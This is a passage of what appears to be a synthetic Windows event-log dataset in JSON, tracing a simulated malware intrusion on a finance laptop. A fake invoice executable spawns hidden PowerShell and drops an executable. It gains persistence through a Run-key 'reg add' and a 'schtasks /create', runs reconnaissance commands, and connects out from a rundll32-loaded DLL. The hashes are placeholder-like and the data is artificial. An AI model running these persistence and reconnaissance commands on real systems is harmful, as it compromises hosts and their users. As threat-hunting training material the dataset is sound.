    "process_name":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "image_path":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":10244,
    "command_line":"Invoice_Review.exe",
    "registry_path":null,
    "network_ip":"45.77.32.18",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"ce001122334455667788990011223344556677889900aabbccddeeff2233",
    "signed":false,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:24:01Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "parent_pid":10244,
    "pid":10488,
    "command_line":"powershell.exe -nop -w hidden",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"df1122334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4104,
    "timestamp":"2026-07-11T08:24:09Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Microsoft-Windows-PowerShell/Operational",
    "provider":"PowerShell",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "parent_pid":10244,
    "pid":10488,
    "command_line":"powershell.exe -nop -w hidden",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"PowerShell script block logged",
    "hash_sha256":"df1122334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"PowerShell script execution was recorded.",
    "source":"PowerShell Operational Log"
  },

  {
    "event_id":11,
    "timestamp":"2026-07-11T08:25:12Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Microsoft-Windows-Sysmon/Operational",
    "provider":"Sysmon",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Users\\m.wilson\\AppData\\Local\\Temp\\update_cache.exe",
    "image_path":"C:\\Users\\m.wilson\\AppData\\Local\\Temp\\update_cache.exe",
    "parent_process":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_pid":10488,
    "pid":11020,
    "command_line":"update_cache.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"File created",
    "hash_sha256":"e12233445566778899001122334455667788990011223344556677889900",
    "signed":false,
    "severity":"Information",
    "description":"A file system event was recorded.",
    "source":"Sysmon File Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:27:36Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\reg.exe",
    "image_path":"C:\\Windows\\System32\\reg.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":11200,
    "pid":11344,
    "command_line":"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDriveUpdate /t REG_SZ /d C:\\Users\\m.wilson\\AppData\\Local\\Temp\\update_cache.exe",
    "registry_path":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDriveUpdate",
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"f23344556677889900112233445566778899001122334455667788990011",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:30:42Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0x99AA21",
    "process_name":"C:\\Windows\\System32\\control.exe",
    "image_path":"C:\\Windows\\System32\\control.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":12044,
    "command_line":"control.exe printers",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"04455667788990011223344556677889900112233445566778899001122",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  }, 
  {
    "event_id":5156,
    "timestamp":"2026-07-11T08:35:18Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0x99AA21",
    "process_name":"C:\\Windows\\System32\\control.exe",
    "image_path":"C:\\Windows\\System32\\control.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":12044,
    "command_line":"control.exe printers",
    "registry_path":null,
    "network_ip":"10.10.1.30",
    "network_port":445,
    "action":"Network connection allowed",
    "hash_sha256":"04455667788990011223344556677889900112233445566778899001122",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:39:51Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\schtasks.exe",
    "image_path":"C:\\Windows\\System32\\schtasks.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":11200,
    "pid":12820,
    "command_line":"schtasks /query",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"15566778899001122334455667788990011223344556677889900112233",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4698,
    "timestamp":"2026-07-11T08:41:03Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\schtasks.exe",
    "image_path":"C:\\Windows\\System32\\schtasks.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":11200,
    "pid":13012,
    "command_line":"schtasks /create /tn FinanceSync /tr C:\\Users\\m.wilson\\AppData\\Local\\Temp\\update_cache.exe /sc daily",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Scheduled task created",
    "hash_sha256":"26677889900112233445566778899001122334455667788990011223344",
    "signed":true,
    "severity":"Information",
    "description":"A scheduled task creation event was recorded.",
    "source":"Windows Task Scheduler"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:44:28Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\cmd.exe",
    "image_path":"C:\\Windows\\System32\\cmd.exe",
    "parent_process":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_pid":10488,
    "pid":13420,
    "command_line":"cmd.exe /c ipconfig /all",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"37788990011223344556677889900112233445566778899001122334455",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:45:09Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\net.exe",
    "image_path":"C:\\Windows\\System32\\net.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":13420,
    "pid":13604,
    "command_line":"net user",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"48899001122334455667788990011223344556677889900112233445566",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:52:44Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\whoami.exe",
    "image_path":"C:\\Windows\\System32\\whoami.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":13420,
    "pid":14088,
    "command_line":"whoami /all",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"59900112233445566778899001122334455667788990011223344556677",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":11,
    "timestamp":"2026-07-11T08:57:16Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Microsoft-Windows-Sysmon/Operational",
    "provider":"Sysmon",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Users\\m.wilson\\AppData\\Roaming\\Microsoft\\Templates\\cache.dll",
    "image_path":"C:\\Users\\m.wilson\\AppData\\Roaming\\Microsoft\\Templates\\cache.dll",
    "parent_process":"C:\\Windows\\System32\\rundll32.exe",
    "parent_pid":14520,
    "pid":14604,
    "command_line":"rundll32.exe cache.dll,Start",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"File created",
    "hash_sha256":"6aa11223344556677889900112233445566778899001122334455667788",
    "signed":false,
    "severity":"Information",
    "description":"A file system event was recorded.",
    "source":"Sysmon File Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:02:22Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0x99AA21",
    "process_name":"C:\\Windows\\System32\\taskmgr.exe",
    "image_path":"C:\\Windows\\System32\\taskmgr.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":15120,
    "command_line":"taskmgr.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"7bb22334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T09:05:37Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"NT AUTHORITY\\SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Program Files\\Windows Defender\\MsMpEng.exe",
    "image_path":"C:\\Program Files\\Windows Defender\\MsMpEng.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":16040,
    "command_line":"MsMpEng.exe",
    "registry_path":null,
    "network_ip":"20.42.65.89",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"8cc33445566778899001122334455667788990011223344556677889900",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4634,
    "timestamp":"2026-07-11T09:08:11Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0x99AA21",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"User logoff",
    "hash_sha256":"9dd44556677889900112233445566778899001122334455667788990011",
    "signed":true,
    "severity":"Information",
    "description":"A user session ended.",
    "source":"Windows Security Event Log"
  },
  {
    "event_id":4624,
    "timestamp":"2026-07-11T09:15:44Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":"192.168.10.44",
    "network_port":0,
    "action":"Administrator logon",
    "hash_sha256":"aa556677889900112233445566778899001122334455667788990011223344",
    "signed":true,
    "severity":"Information",
    "description":"A user authentication event was recorded.",
    "source":"Windows Security Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:17:20Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\mmc.exe",
    "image_path":"C:\\Windows\\System32\\mmc.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":17120,
    "command_line":"mmc.exe compmgmt.msc",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"bb667788990011223344556677889900112233445566778899001122334455",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":7045,
    "timestamp":"2026-07-11T09:20:14Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"System",
    "provider":"Service Control Manager",
    "level":"Information",
    "user":"NT AUTHORITY\\SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Windows\\System32\\services.exe",
    "image_path":"C:\\Program Files\\FinanceAgent\\agent.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":17440,
    "command_line":"agent.exe -service",
    "registry_path":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\FinanceAgent",
    "network_ip":null,
    "network_port":null,
    "action":"Service installed",
    "hash_sha256":"cc778899001122334455667788990011223344556677889900112233445566",
    "signed":true,
    "severity":"Information",
    "description":"A service installation event was recorded.",
    "source":"Windows Service Control Manager"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:25:49Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\cmd.exe",
    "image_path":"C:\\Windows\\System32\\cmd.exe",
    "parent_process":"C:\\Windows\\System32\\mmc.exe",
    "parent_pid":17120,
    "pid":18032,
    "command_line":"cmd.exe /c dir C:\\Users\\m.wilson\\AppData\\Local\\Temp",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"dd889900112233445566778899001122334455667788990011223344556677",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4663,
    "timestamp":"2026-07-11T09:26:03Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\cmd.exe",
    "image_path":"C:\\Windows\\System32\\cmd.exe",
    "parent_process":"C:\\Windows\\System32\\mmc.exe",
    "parent_pid":17120,
    "pid":18032,
    "command_line":"cmd.exe /c dir",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"File accessed",
    "hash_sha256":"dd889900112233445566778899001122334455667788990011223344556677",
    "signed":true,
    "severity":"Information",
    "description":"A file access event was recorded.",
    "source":"Windows File Auditing"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:31:27Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\wevtutil.exe",
    "image_path":"C:\\Windows\\System32\\wevtutil.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":18032,
    "pid":18504,
    "command_line":"wevtutil.exe gli Security",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"ee990011223344556677889900112233445566778899001122334455667788",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T09:36:42Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"NT AUTHORITY\\SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Program Files\\FinanceAgent\\agent.exe",
    "image_path":"C:\\Program Files\\FinanceAgent\\agent.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":17440,
    "command_line":"agent.exe -service",
    "registry_path":null,
    "network_ip":"10.10.5.50",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"cc778899001122334455667788990011223344556677889900112233445566",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:40:16Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\rundll32.exe",
    "image_path":"C:\\Windows\\System32\\rundll32.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":19112,
    "command_line":"rundll32.exe C:\\Users\\m.wilson\\AppData\\Roaming\\Microsoft\\Templates\\cache.dll,Start",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"ff001122334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T09:41:03Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\rundll32.exe",
    "image_path":"C:\\Windows\\System32\\rundll32.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":19112,
    "command_line":"rundll32.exe cache.dll,Start",
    "registry_path":null,
    "network_ip":"185.225.69.44",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"ff001122334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4634,
    "timestamp":"2026-07-11T09:45:30Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"User logoff",
    "hash_sha256":"00112233445566778899001122334455667788990011223344556677889900",
    "signed":true,
    "severity":"Information",
    "description":"A user session ended.",
    "source":"Windows Security Event Log"
  }, 
  {
    "event_id":4624,
    "timestamp":"2026-07-11T09:52:12Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":"192.168.10.44",
    "network_port":0,
    "action":"User logon",
    "hash_sha256":"11223344556677889900112233445566778899001122334455667788990011",
    "signed":true,
    "severity":"Information",
    "description":"A user authentication event was recorded.",
    "source":"Windows Security Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T09:54:08Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\explorer.exe",
    "image_path":"C:\\Windows\\explorer.exe",
    "parent_process":"C:\\Windows\\System32\\userinit.exe",
    "parent_pid":1240,
    "pid":4428,
    "command_line":"explorer.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"22334455667788990011223344556677889900112233445566778899001122",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4698,
    "timestamp":"2026-07-11T09:56:31Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\schtasks.exe",
    "image_path":"C:\\Windows\\System32\\schtasks.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":20240,
    "pid":20312,
    "command_line":"schtasks /query /fo LIST",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Scheduled task query",
    "hash_sha256":"33445566778899001122334455667788990011223344556677889900112233",
    "signed":true,
    "severity":"Information",
    "description":"A scheduled task operation was recorded.",
    "source":"Windows Task Scheduler"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T10:02:47Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\reg.exe",
    "image_path":"C:\\Windows\\System32\\reg.exe",
    "parent_process":"C:\\Windows\\System32\\cmd.exe",
    "parent_pid":20240,
    "pid":20544,
    "command_line":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "registry_path":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "network_ip":null,
    "network_port":null,
    "action":"Registry query",
    "hash_sha256":"44556677889900112233445566778899001122334455667788990011223344",
    "signed":true,
    "severity":"Information",
    "description":"A registry operation was recorded.",
    "source":"Windows ETW Registry Monitoring"
  },

  {
    "event_id":4663,
    "timestamp":"2026-07-11T10:08:19Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":21120,
    "command_line":"EXCEL.EXE Budget_2026.xlsx",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"File accessed",
    "hash_sha256":"55667788990011223344556677889900112233445566778899001122334455",
    "signed":true,
    "severity":"Information",
    "description":"A file access event was recorded.",
    "source":"Windows File Auditing"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T10:12:54Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"NT AUTHORITY\\SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Program Files\\Windows Defender\\MsMpEng.exe",
    "image_path":"C:\\Program Files\\Windows Defender\\MsMpEng.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":16040,
    "command_line":"MsMpEng.exe",
    "registry_path":null,
    "network_ip":"20.190.155.137",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"66778899001122334455667788990011223344556677889900112233445566",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T10:17:42Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\powershell.exe",
    "image_path":"C:\\Windows\\System32\\powershell.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":22044,
    "command_line":"powershell.exe Get-Process",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"77889900112233445566778899001122334455667788990011223344556677",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4104,
    "timestamp":"2026-07-11T10:18:01Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Microsoft-Windows-PowerShell/Operational",
    "provider":"PowerShell",
    "level":"Information",
    "user":"administrator",
    "domain":"CORP",
    "logon_id":"0xAB721",
    "process_name":"C:\\Windows\\System32\\powershell.exe",
    "image_path":"C:\\Windows\\System32\\powershell.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":22044,
    "command_line":"powershell.exe Get-Process",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"PowerShell script block logged",
    "hash_sha256":"77889900112233445566778899001122334455667788990011223344556677",
    "signed":true,
    "severity":"Information",
    "description":"PowerShell script execution was recorded.",
    "source":"PowerShell Operational Log"
  },

  {
    "event_id":6005,
    "timestamp":"2026-07-11T10:25:30Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"System",
    "provider":"EventLog",
    "level":"Information",
    "user":"SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Windows\\System32\\services.exe",
    "image_path":"C:\\Windows\\System32\\services.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":956,
    "command_line":"services.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Event log service started",
    "hash_sha256":"88990011223344556677889900112233445566778899001122334455667788",
    "signed":true,
    "severity":"Information",
    "description":"The Windows Event Log service reported a status change.",
    "source":"Windows Event Log"
  },

  {
    "event_id":4634,
    "timestamp":"2026-07-11T10:31:45Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"User logoff",
    "hash_sha256":"99001122334455667788990011223344556677889900112233445566778899",
    "signed":true,
    "severity":"Information",
    "description":"A user session ended.",
    "source":"Windows Security Event Log"
  }

]








